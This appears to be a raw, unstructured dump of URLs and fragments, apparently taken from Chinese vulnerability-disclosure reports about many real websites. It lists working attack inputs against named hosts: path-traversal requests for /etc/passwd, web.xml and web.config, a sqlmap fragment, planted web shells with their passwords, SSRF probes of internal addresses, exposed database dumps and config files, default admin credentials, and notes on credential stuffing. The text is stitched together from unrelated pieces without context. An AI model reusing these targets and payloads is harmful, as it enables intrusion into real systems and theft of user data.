https://**.**.**.**/node/stock-market/plaza/sell?ent_name=123 http://www.dzqh.com.cn http://www.dzqh.com.cn/UploadFileDir/content_file/20150408203503006962970.jsp http://manage.juhai.youku.com/audit/auditCommentList?auditStatus=2 http://m.jrj.com.cn/sso/mobileLogin http://**.**.**.**/ http://vipdrvier.vvipone.com http://ws.ebaoyang.cn http://z.ebaoyang.cn http://admin.ebaoyang.cn http://j.ebaoyang.cn http://w.ebaoyang.cn http://c.ebaoyang.cn http://c2.ebaoyang.cn http://**.**.**.**/ http://**.**.**.**/phpMyAdmin/index.php http://**.**.**.**/phpinfo.php获取到的) http://**.**.**.**/upload.php?Type= http://**.**.**.**/updatesn.php http://**.**.**.**/showurl.asp?id=32555 http://**.**.**.** https://218.78.217.82/fail http://218.78.217.82:8000/cardmanage/ http://workflow.cyou-inc.com//messager/users.data http://**.**.**.**/ http://**.**.**.**/User/ http://**.**.**.**/Inc/ http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-0148202这个ip是甘肃省安全考试系统。 http://**.**.**.**/bugs/wooyun-2014-065195某公司开发的e-Learning系统存在通用SQL注入漏洞。涉及的比较广:银行、邮政、证券、学校、企业、事业单位等。 http://**.**.**.**) http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 
http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://**.**.**.**/eln3_asp/index.do http://**.**.**.**:808/eln3_asp/public/gzjcjt/resource_list.jsp http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/public/cscec8b/login_cscec8b.jsp http://**.**.**.**:8080/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/ http://**.**.**.**/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml 
http://**.**.**.**/eln3_asp/ http://**.**.**.**/eln3_asp/ http://**.**.**.**/eln3_asp/index.do http://**.**.**.**/eln3_asp/index.do http://mall.laolaibao.com/data/,http://mall.laolaibao.com/includes/,存在目录遍历,可泄露数据库配置信息、ecs用户信息和其它源码信息。另外某处可上传任意文件,但未找到上传路径。 user:admin password:admin http://www.feeyo.com/ https://github.com/superman66/ChiQiFound/blob/0f45e27f1309e66841795835765ade0094aba5ed/src/core/app/jdbc_dev.properties http://b.daojia.com.cn/.svn/entries http://**.**.**.**/portal/fsxz/ http://**.**.**.**/canting/map/gongjiao/?s=mlyhdjgcd1889&ea= http://**.**.**.**/canting/map/gongjiao/?s=jwxsxlmg6741&ea= http://**.**.**.**/canting/map/zijia/?s=qbfssd4286&ea= http://**.**.**.**/canting/map/gongjiao/?s=JNCZHACD823&ea= http://wx.laolaibao.com/page_jp.aspx?pdate=2015-08-14 http://www.sftm.com.cn/news.asp?ClassID=0204&absolutepage=12&select=2008 http://**.**.**.** http://61.149.46.14:8080/ http://61.149.46.14:8080/is/index.jsp http://**.**.**.**//public/upload/file.jsp http://**.**.**.**/public/upload/file.jsp http://**.**.**.**/public/upload/file.jsp http://**.**.**.**//public/upload/file.jsp http://**.**.**.**/page/w/2/w/w01702v6d2w.html http://up.tootoo.cn/upload.jsp http://**.**.**.**/SGTD04reg/Candidate/C_SignIn.aspx http://**.**.**.**/SGTD17reg/Candidate/C_SignIn.aspx?code=141021 http://**.**.**.**/SGTD11reg/Candidate/C_SignIn.aspx?code=150808 http://**.**.**.**/SGTD39reg/Candidate/C_SignIn.aspx?code=141128 http://**.**.**.**/SGTD60reg/Candidate/C_SignIn.aspx?code=150121 http://**.**.**.**/SGTD42reg/Candidate/C_SignIn.aspx?code=141206 http://**.**.**.**/SGTD45reg/Candidate/C_SignIn.aspx?code=20141207 http://**.**.**.**:7942/SGZJ42reg/Group/G_SignIn.aspx http://**.**.**.**:7942/SGTD52reg/Candidate/C_SignIn.aspx http://**.**.**.**/SGTD73reg/Candidate/C_SignIn.aspx http://assess.yaochufa.com/admini/public/login http://localhost:7002&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 
jdbc:oracle:thin:@**.**.**.**:1521:FMETRO https://**.**.**.**/laolang81/food/blob/2312771af5555d6b9c81c17fb1564be024adbe76/config/properties/mail.properties http://**.**.**.**/edoas2/oa.jsp http://**.**.**.**/hbxx/hbxx.aspx?hkgs=MF http://mi.xcar.com.cn/interface/gcpapp/desireApply.php http://**.**.**.**/zhuanti/zhuanchang/index.php?zid=3981359526867737"--dbs http://www.wooyun.org/bugs/wooyun-2015-0150214 http://www.wooyun.org/bugs/wooyun-2015-0150213 http://mail.91tianmi.com http://182.92.235.112:8080/tm_calc/cms/resource/about/list/1 http://**.**.**/tm_web_admin http://**.**.**/tm_master/_ http://git.91tianmi.com:8083 http://182.92.235.112:8080/tm_calc/login https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(微信的用户值)&skey=(微信的用户值) https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 www.faw-foundry.com.cn http://wlds.hit.edu.cn/WindLab/zxgj.jsp?id=6 http://wap.jjwxc.net/book2/541143/1 http://61.184.32.10:8888/login.jsp;jsessionid=e5ff37ef8605b5a85403746e6584058d http://www.midifan.com/modulehardware-goods.htm?sid=1 http://www.zzidc.com/main/virtualhost/addshopping.action, http://www.haodai.com/ajax/getpasswd http://doctor.club.xywy.com/new/index.php?type=message http://182.254.138.136/ http://www.gxtmall.cn/ http://www.vatti.com.cn/getlist2.php?city=t&id=&cateid=159 http://www.vatti.com.cn/getlist.php?city=t&id=&cateid=159 http://**.**.**.**/bugs/wooyun-2015-0140090 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=30005 https://github.com/523039704/aa/blob/abd8a4930ea80c53098b570c876efc70a7f271aa/bbs.issgame.com/config/config.properties jdbc:mysql://114.112.58.158:3306/fgpbilling?useUnicode=true&characterEncoding=utf8 http://**.**.**.**/news/html/?505.html http://i.swufe.edu.cn/net/page/empty_more.php?i=b%25 http://**.**.**.**/news_x.aspx?id=41 
http://afis.hit.edu.cn//examples/servlets/servlet/SessionExample http://ee403.hit.edu.cn/asp/view.asp?id=454 http://iedc.hit.edu.cn/newsshowDetail.asp?id=169 http://oia.hit.edu.cn/zhaopin.asp?ClassID=29 http://imccc2012.hit.edu.cn/imccc2012.sql http://ee403.hit.edu.cn/database.rar http://ices.hit.edu.cn/admin/ewebeditor/db/ewebeditor.mdb android:exported="true android:name="**.**.**.**work.DownloadService android:process="**.**.**.**work.DownloadService android:priority="1000 android:name="**.**.**.**work.DownloadService"/ http://**.**.**/scweb/show.jspid=227&type=0&child_type=25_ http://**.**.**/findItemForDep.SmbsServletpageFlag=spzn&depID=0036_ http://**.**.**/findItemForDep.SmbsServletpageFlag=spzn&depID=903_ http://**.**.**/scweb/zwdt/depIntrl.jspdepid=_ http://**.**.**/web/zwdt/depIntrl.jspdepid=_ http://**.**.**/web/zwdt/bgxz_bg.jspid=102_ http://**.**.**/scweb/zwdt/bgxz_bg.jspid=0001_ http://**.**.**/web/zwdt/bszn.jsppageFlag=spzn&itemid=101001001&depid=101001_ http://**.**.**/web/zwdt/bszn.jsppageFlag=spzn&itemid=01001&depid=903_ http://**.**.**/scweb/zwdt/bszn.jsppageFlag=spzn&itemid=0001001&depid=0001_ http://**.**.**/web/zxxx/web.webservletaction=zxxxsearch&type=0&child_type=25&child_name=%D6%D0%D0%C4%D0%C2%CE%C5_ http://**.**.**/web.webservletaction=getnews&type=24&child_type=0 http://**.**.**/scweb/zxxx/scweb.scwebservletaction=zxxxsearch&type=0&child_type=25&child_name=%D6%D0%D0%C4%D0%C2%CE%C5_ http://**.**.**/web/zwdt/findwebqa.qaaction=findwebqa_ http://**.**.**/web/zwdt/findwebqa.qaaction=findwebqa_ http://**.**.**/scweb/web/zwdt/findwebqa.qaaction=findwebqa https://182.92.148.48/ redis_version:2.8.8 redis_git_sha1:00000000 redis_build_id:7baf01e2b5c7573a redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.6.3 process_id:806 run_id:f608fb73456812994ce883fb0d10c53e818ad837 tcp_port:6379 uptime_in_seconds:12543625 uptime_in_days:145 lru_clock:3248032 config_file:/etc/redis/6379.conf used_memory:6621488 used_memory_human:6.31M 
used_memory_rss:8585216 used_memory_peak:8446568 used_memory_peak_human:8.06M used_memory_lua:33792 mem_fragmentation_ratio:1.30 mem_allocator:libc rdb_last_save_time:1446088362 total_connections_received:618701950 total_commands_processed:1002116377 expired_keys:136358 keyspace_hits:936326347 keyspace_misses:481203 latest_fork_usec:246 role:master repl_backlog_size:1048576 used_cpu_sys:268089.44 used_cpu_user:40124.07 used_cpu_sys_children:103.17 used_cpu_user_children:439.12 db0:keys=100,expires=66,avg_ttl=7611829427 http://**.**.**.**/bugs/wooyun-2015-0141038 http://**.**.**.**:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://**.**.**.**/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://**.**.**.**:8078/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://**.**.**.**:4455/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://**.**.**.**/zfoa//gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00 http://eas75.kingdee.com:85/ http://zygx.nwpu.edu.cn/2015/renliziyuanguanli/HRM/lyb/reply.asp?l_id=13 http://www.nfu.edu.cn/ http://www.nfsysu.cn/ http://www.skyworthlcd.com/en/Product.aspx?s=a http://app.wanda.cn/wanda3v/user/userinfo.html?userid=wangyang http://**.**.**.**/news_x.aspx?id=76 http://wap.damai.cn/login.aspx,此处无限制,可撞库,从14万库中可撞得2788个有效账号,登陆后可查看订单信息和收货地址,可泄露大量用户信息。 http://activity.yaochufa.com/lottery/getresult/joinprize?id=207 http://**.**.**.**:88/ 
http://**.**.**.**:88/message/send/601from_url=http%3A%2F%2F**.**.**.**%3A88%2Fmessage%2Fdetails%2F601 http://**.**.**.**/test@.txt http://oa.daojia.58.com https://github.com/sdugb/RenderCommunity/blob/33a6c27da8e33ee70b5761f11c76319b2e5ed54a/config.js http://mail.nwpu.edu.cn/ http://222.24.192.85/ http://www.blogbus.com/brigham-logs/336886977.html http://t.178.com/user/login?to=http%3A%2F%2Ft.178.com%2Fresource%2Fshow%3Ftoken32%3D22cb5f2a1e5568b686437f73f5dcef24登录你的二次元身份设计缺陷可撞库用户,用户名密码均明文传输的: http://121.34.249.235/总部IT系统产品管理网站 http://www.comicup.cn/benzi/nccuser.aspx?c=1 http://www.comicup.cn/benzi/ajax/NCCUser/getUserInfo.ashx http://media.moa.zte.com.cn/mpp/MsgView.action encap:Ethernet addr:10.30.7.188 Bcast:10.30.255.255 Mask:255.255.0.0 fe95:691a/64 Scope:Link MTU:1500 packets:1014612456 packets:69261279 txqueuelen:1000 http://www.eb80.com.cn/retrieve.aspx http://www.eb80.com.cn/login.aspx www.eb80.com.cn http://www.eb80.com.cn http://passport.8684.com/8684/login_b_v2.php?ref=http%253A%252F%252Fpassport.8684.com%252F8684%252Fgetpwd.php&&f5=0&v=1446109308563这处登录的接口,抓包发现用户名密码都是明文的,然后也没发现验证码 http://**.**.**.**/ http://**.**.**.**/newsview.asp?News_ID=9 http://**.**.**.**:8081/)存在Sql注入漏洞 https://manhattan.liwushuo.com/admin/ldap/login http://**.**.**.**/ http://**.**.**.**/ http://demo.weiphp.cn/index.php?s=/Home/Public/step_2/id/138.html http://demo.weiphp.cn/index.php?s=/Home/Public/step_2/id/*.html http://i.huanqiu.com/login这个地方一开始是没有验证码的,然后输入错误达到一定次数就出来了验证码: http://**.**.**.**/faces/pages/ticketMain.xhtml https://**.**.**.**/search?newwindow=1&hl=zh-CN&site=imghp&tbm=isch&sa=1&q=新世界影城+会员卡&oq=新世界影城+会员卡 http://**.**.**.**/ci/20120701/10420009.180226.944.jpg site:newcapec.net,百度一下你就知道,google一下你知道的太多了 http://cos.sto.cn http://cos.sto.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=a https://**.**.**.** https://**.**.**.**/member/memberRegistryAction!validateUserName.action 
https://**.**.**.**/member/memberRegistryAction!validateUserName.action链接,即可重置该用户手机号 http://**.**.**.**/index.php http://**.**.**.**/ https://**.**.**.**/dennisnunezph/cgg-dockerfiles/blob/06329218b21a40349453192f065914d1c3c68db7/libris/.env http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://blog.sohu.com/resin-admin/index.php http://ruanwen.lusongsong.com/anli/anliinfo.php?ID=88) http://ruanwen.lusongsong.com/upload/headpic/style.php http://lusongsong.com/zb_system/login.asp http://**.**.**.**/InfoMsg/ http://**.**.**.**/ImageWeb/2013/%E5%B9%B4%E6%A3%80/ http://localhost:7002&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/xylogin.asp http://**.**.**.**/bugs/wooyun-2010-0148921 http://**.**.**.**/messager/users.data http://www.gohealth.ecnu.edu.cn/ http://www.yjsjl.ecnu.edu.cn/ http://www.yjsjl.ecnu.edu.cn/news/manage/login/login.asp http://202.104.30.113:8000/ http://202.104.30.113:8000/console/login/LoginForm.jsp http://202.104.30.113:8000/ma/ma3.jsp http://cpadmin.ule.com/cpadmin/login.do https://**.**.**.** http://210.21.236.163 http://mi.xcar.com.cn/interface/gcpapp/lottoryQuery.php?cityId=475&deviceId=A0000038000000&deviceType=0&rollNumbers=-1 http://user.qbcdn.com/user/avatar/queryAvata65/25004061/nosrc/1000 http://**.**.**.**:7001/console/ http://**.**.**.**/showthread.php?t=156643 http://**.**.**.**/dis9_tysan http://**.**.**.**/WebUI/Login.aspx?ReturnUrl=%2fWebUI%2fPortal.ashx http://star.ctsho.com/platform/logout.action http://**.**.**.**/agent-self/logout.action存在命令执行漏洞 http://game.sports.sina.com.cn http://yangtai.xunlei.com/ http://**.**.**.**/InfoQueryService/AlarmService/SaveGuardVehAlarm soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body 
http://**.**.**.**/InfoQueryService/AlarmService soap:Body soap:Envelope http://ke2u.com/ http://**.**.**.**/ http://125.210.135.167:133/manage/login.action http://**.**.**.**/shop/member!logout.action存在命令执行漏洞 http://**.**.**.**/test.jsp密码tom http://www.liwushuo.com/app http://**.**.**.**/chinatelcom/speedtest/sccs/index.shtml http://mainone.cn/ http://main one.cn/CompanyTemplate/Default/CompanyNewsList.aspx?CompanyID=400428740-- http://mainone.cn/Supply/SupplyList.aspx?ChangeType=0 http://mainone.cn/Admin/login.aspx http://m.100tal.com:80/ http://**.**.**.**/bbs/bbsAction!replyList.action?topic.id=182&bbsType=2存在上传漏洞,打开这个网页,添加附件 http://**.**.**.**/attached/bbs/2015103009323256985849.jsp密码tom http://**.**.**.**/attached/bbs/2015103009224839638271.jsp密码123 http://**.**.**.**/position/show.php?id=2734 http://m.t.ikang.com/#/enter/Order/myOrderDetail/1446135404032555 http://m.t.ikang.com http://**.**.**.**/ http://**.**.**.**/phpmyadmin http://43.242.50.237:9200/ http://43.242.50.236:9200/ http://**.**.**.**/ireadbass/login.htm http://fcs.9cair.com http://fcs.9cair.com/ImageShowServlet?para=fcs123&filetype=1&filePath=../../../../../../../../../etc/passwd%00 https://**.**.**.**/ http://i.ziroom.com/ http://shanghai.daojia.com.cn/combo_list.php?p=1&a=75 http://beijing.daojia.com.cn/food_search.php?a=1&r=12401&name= http://school.suning.com/ http://smile.wanda.cn/app/oauth/advice?count=0&page=0&t=1446172201.354999&uid=§66609§ http://image.wanda.cn/smile/upload/mobile/2014/05/23/20140523112010_150.jpg http://fanyi.baidu.com/transpage?query=https%3A%2F%2Ftest-bingd0ng.c9.io%2FFY.php&source=url&ie=utf8&from=auto&to=zh&render=1 http://**.**.**.**:9098/feedback/feedbackLogin.do?method=logon http://zhuanlan.daojia.com.cn/wp-login.php http://www.chdyh.com.cn/yhmd/vvise.do?method=secondaryMenu&cid=03.03 http://221.8.57.98:7005/EbsWeb/getMyInsurance.do?UIAction=checkContent&consultationID=220000000000000054 http://tang.damai.cn/ask/ http://115.236.185.239/dashboard/ 
http://115.236.185.253/index.php?q=index&goto=feedback/list&ac=noreply http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/uploads/%E9%99%84%E4%BB%B6%EF%BC%9A%E8%BF%8E%E6%96%B0%E7%B3%BB%E7%BB%9F%E4%BD%BF%E7%94%A8%E8%AF%B4%E6%98%8E%E6%96%B0.doc http://60.28.195.106:8100/.svn/entries http://60.28.198.35/log/ http://**.**.**.** http://61.50.187.141/login!login1.action http://61.50.187.141/one8.jsp http://61.50.187.141/cmd.jsp http://61.50.187.141/nei.jsp?http://10.101.240.11:80 http://61.50.187.141/nei.jsp?http://10.101.240.16:80 http://61.50.187.141/nei.jsp?http://10.101.240.21:80 http://61.50.187.141/nei.jsp?http://10.101.240.22:80 http://61.50.187.141/nei.jsp?http://10.101.240.25:80 http://61.50.187.141/nei.jsp?http://10.101.240.30:80 http://61.50.187.141/nei.jsp?http://10.101.240.33:80 http://61.50.187.141/nei.jsp?http://10.101.240.35:80 http://61.50.187.141/nei.jsp?http://10.101.240.36:80 http://61.50.187.141/nei.jsp?http://10.101.240.37:80 http://61.50.187.141/nei.jsp?http://10.101.240.39:80 http://61.50.187.141/nei.jsp?http://10.101.240.40:80 http://61.50.187.141/nei.jsp?http://10.101.240.50:80 http://61.50.187.141/nei.jsp?http://10.101.240.51:80 http://61.50.187.141/nei.jsp?http://10.101.240.55:80 http://61.50.187.141/nei.jsp?http://10.101.240.71:80 http://61.50.187.141/nei.jsp?http://10.101.240.80:80 http://61.50.187.141/nei.jsp?http://10.101.240.87:80 http://61.50.187.141/nei.jsp?http://10.101.240.90:80 http://61.50.187.141/nei.jsp?http://10.101.240.96:80 http://61.50.187.141/nei.jsp?http://10.101.240.103:80 http://61.50.187.141/nei.jsp?http://10.101.240.104:80 http://61.50.187.141/nei.jsp?http://10.101.240.113:80 http://61.50.187.141/nei.jsp?http://10.101.240.114:80 http://61.50.187.141/nei.jsp?http://10.101.240.120:80 http://61.50.187.141/nei.jsp?http://10.101.240.121:80 http://61.50.187.141/nei.jsp?http://10.101.240.122:80 http://61.50.187.141/nei.jsp?http://10.101.240.138:80 
https://**.**.**.**/wkServer/wkServer/blob/e0eb8b673428b223603f325107abc9e8af567cc5/config/db.properties jdbc:mysql**.**.**.**:3306/wo_sales?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132 http://www.56.com/w/movie/get.phtml?callback=jsonp_operaNew&slite=1&mid=24132 http://standard.kjpt.91huayi.com/frame/index.aspx http://os.wasu.cn/mp/mp.php?id=330 http://open.ikamobile.cn:8391/ordermanage?uid=19&partner_id=002 http://www.homelinkhr.com/view_initIndexPageForCustomer.action http://**.**.**.** http://qu.8684.com这个网站的登录位置没有验证码: http://m.ahic.com.cn/wxpt/claimsSeachAction.do http://221.8.57.98:7005/EbsWeb/ge http://ff.zqgame.com/ff.zqgame.com.tar.gz http://k.ganji.com/password?returnUrl=%2Fuc www.fengniao.com http://www.aimer.com.cn/account/address?page=myaddress http://**.**.**.**/Member/MemberLogin.aspx http://**.**.**.**//Login.aspx http://sso.dwb.so/changepassword_check.php验证码,输入任意6位验证码即可成功,导致任意手机号登陆,更奇怪的是不发送验证码也能改密码。。。 http://v.dwb.so/buy.php)vip存在支付漏洞; http://sso.dwb.so/changepassword_check.php http://**.**.**.**/GetC_InfoSharedModules soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Header http://**.**.**.**/ http://**.**.**.**/GovernmentDetail.aspx?tuId=286&NRID=123 http://**.**.**.**/NewsCenter/NewsDetail.aspx?id=99897 http://**.**.**.**/radnew.aspx?id=123&pid=201102150834270468 http://**.**.**.**/ZWGK/Content.aspx?uid=123&cid=64&id=2063 http://**.**.**.**/Info_zx/info_par.aspx?id=123746 http://**.**.**.**/Info_zx/info_par.aspx?id=123303 http://**.**.**.**/imageshow/Imageshow.aspx?bigcataid=0-1-20-5&id=123702 http://**.**.**.**/news_bak.aspx?id=123 http://**.**.**.**/websites/Pages/Web/NewsDetails.aspx?id=25a88d66-c4b3-4f50-ac6e-71123e3a646b http://**.**.**.**/NewsView.aspx?ID=12314&MID=460 
http://**.**.**.**/Client/NewInfo.aspx?Id=123&deptId=23 http://**.**.**.**/gov_affair/orb_jbxx.aspx?orb_id=123 http://**.**.**.**/zwgk/Show.aspx?id=39123 http://**.**.**.**/NewsDetail.aspx?id=123 http://**.**.**.**/Info_zx/info_par.aspx?id=123746 http://**.**.**.**/infoshow.aspx?id=2494&ws=002002 http://**.**.**.**/Print.aspx?id=123849 http://**.**.**.**/Infomation/showinfo.aspx?ID=12324 http://**.**.**.**/cyfc/newshow.aspx?id=123 http://**.**.**.**/UpFile/template/contentpage/zgwj_Xwzxnew/item.aspx?tc=1&id=123919&p=0 http://**.**.**.**/clbweb2005/China/jiangsu/suzhougs/NewsShow.aspx?consume=1&InfoID=123 http://**.**.**.**/newsinfo.aspx?NodeCode=10001000200090001&id=331123 http://**.**.**.**/view.aspx?id=134123 http://**.**.**.**/info_03_html.aspx?Id=60123&tablename=CurrencyInfo http://**.**.**.**/view.aspx?id=123678 http://**.**.**.**/show.aspx?id=419&cid=123 http://**.**.**.**/visiondetail.aspx?NewsID=30123&CateID=355&NewsCateId=355 http://**.**.**.**/news.aspx?id=123144 http://**.**.**.**/default.aspx?quizid=12327&tabid=1415 http://**.**.**.**/Government/PublicInfoShow.aspx?ID=123 http://**.**.**.**/View.aspx?iMark=2&ListID=138&strName=123 http://**.**.**.**/NewDetials.aspx?id=47123&cid=1080 http://**.**.**.**/doc_show.aspx?artid=30123 http://**.**.**.**/templates/T_second/content.aspx?contentid=12314&nodeid=15&page=ContentPage http://**.**.**.**/news/ArticleDetails.aspx?id=123 http://**.**.**.**/NewsDetails.aspx?id=123 http://**.**.**.**/Item.aspx?id=33123 http://**.**.**.**/newsView.aspx?oid=3&tid=11&id=123 http://**.**.**.**/admin/PageLike.aspx?DocID=219123&ColumnID=000002640002&ChannelID=264&Sum=1 http://**.**.**.**/channel2/document.aspx?id=123103 http://**.**.**.**/channel2/document.aspx?id=123285 http://**.**.**.**/gq60zn/document.aspx?id=123103 http://**.**.**.**/gq60zn/document.aspx?id=123303 http://**.**.**.**/notice/viewnotice.aspx?id=40 http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://www.iskyworth.com/ashx/downlist.ashx?local=0&cid= 
http://www.skyworth.com.ph/ashx/productseach.ashx?TypeId= http://www.skyworth.com.ph/ashx/downlist.ashx?local=0&cid= http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://bbs.huanqiu.com/member.php?mod=logging&action=login这个接口处,貌似是一个论坛的登录接口额,然后抓包发现用户名和密码都是明文传输的 http://mzpx.open.com.cn/MZ_Portal/index.aspx http://dev.anzhuoapk.com/developer/developer/fpwd http://112.126.71.144/ http://**.**.**.**/# http://www.jiumei.com/user/user_showlogin.dhtml?url=/account/order_showList.dhtml这个是酒美网主站的登录的接口,可以看到是有验证码限制的: http://union.kuwo.cn/install/ http://115.182.68.136:1984/?app_id=1&msg_id=0&device_info={"app_id":"1","app_name":"香港航空","app_version":"3.2.1","bssid":"00:00:00:00:00:00","cellLocation":"[0,0,0,0,0]","channel_name":"yyb","device_name":"andorid","imei":"A0000038000000","imsi":"000000000000000","mac_address":"00:00:00:00:00:00","manufacturer":"android","network_sub_type":"WIFI","network_type":"WIFI","os_version":"4.1.2","phone_number":"000000000000000","resolution":"1080*1920","sdk_version":"16","source":"NotificationService","timestamp":"1446130794661","uid":"NMAae6b5036b9e89a4eb72be5b2fc9fcc09"}&type=check_and_post_msg&language=0 http://**.**.**.**/news/newslist.asp?id=5 http://corp.b2b.cn/category/Category/index/cid/321 http://corp.b2b.cn/category/Category/index?cid=321 http://**.**.**.**/bugs/wooyun-2010-0136386 height:20px;BORDER http://xiaoshou.qzestate.com:8000/index.aspx http://**.**.**.**/admin/index/ http://**.**.**.**/admin/newsdir/edit.html http://bm.huatu.com/member/upfile/ http://**.**.**.** http://119.254.70.128/ http://119.254.70.128/Superagent/Reports00.aspx http://**.**.**.**/admin_login.aspx http://**.**.**.**/upload/2015_10/temp_15103011048856.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:81/xwd/admin/backup.aspx http://**.**.**.**/admin/backup.aspx# 
http://**.**.**.**:81/xwd/download2.aspx?fn=../web.config http://**.**.**.**/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/dfsxzzj/download2.aspx?fn=../web.config http://**.**.**.**/wd90/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/download2.aspx?fn=../web.config http://**.**.**.**:81/download2.aspx?fn=../web.config http://**.**.**.**/download2.aspx?fn=../web.config http://**.**.**.**:8091/hw/download2.aspx?fn=../web.config http://**.**.**.**/xywd/download2.aspx?fn=../web.config http://**.**.**.**/xywd/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/dzwd/download2.aspx?fn=../web.config http://**.**.**.**/wd/download2.aspx?fn=../web.config http://**.**.**.**/bugs/wooyun-2015-0141194 height:20px;BORDER http://erp.aoyou.com:8060/login URL:http://epare.airchina.com.cn http://epare.airchina.com.cn/epare/servlet/FileUploadManagerServlet?method=download&UUID=502ec3c5-177b-4b4c-beb1-126c38593a27 http://epare.airchina.com.cn/epare/servlet/FileUploadManagerServlet?method=download&UUID=7b2ae38e-c200-4359-a2ca-708b80627961 